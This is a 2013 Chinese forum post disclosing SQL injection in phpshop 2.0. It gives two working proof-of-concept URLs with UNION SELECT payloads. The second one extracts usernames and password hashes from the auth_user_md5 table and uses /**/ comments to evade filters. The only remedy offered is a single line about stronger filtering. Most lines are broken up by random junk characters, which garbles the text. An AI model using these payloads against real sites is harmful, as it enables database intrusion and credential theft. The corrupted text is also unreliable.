标题 : phpshop 2.0 SQL Injection Vulnerability
) X% L# H! i3 C& X% u3 i* e# Z7 l# U9 E6 e+ D8 P
作者 : By onestree
+ {1 `; Y6 ]" H( {1 P; I下载地址 : http://code.google.com/p/phpshop/downloads/list8 ^1 R! v; t8 h9 ]7 B! {3 n2 y3 w
测试地址: windows 7 / ubuntu) o+ o W! l' e' m' v
- o5 J" G* Y: Q( z+ c& o* I . A7 S' R" w$ z
SQLi p0c:
% T6 Q: v6 I3 L7 \
; u ?: T( E- |- s. f==================
1 j0 h3 x* v* E" c* M' z$ ^( C # O( v5 X8 l5 E) E7 |; `- t0 r
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11': N/ K, K, I4 l: N7 o0 i
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
, D4 o' i* p3 M& q # m( o* C: r5 I j' s
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--5 u t+ O' L5 F9 b: i$ n
0 p! o9 N$ b9 q- K- }; E! w# i修复:: \) V. e6 g Z: S
加强过滤7 G. A* O$ j$ f; F
6 Y$ @% T; w8 a1 u, l" Z# @; R/ i. X2 w1 m+ V+ a2 y8 Y( g
|
发表于 2013-1-18 18:24:10
收藏
支持
反对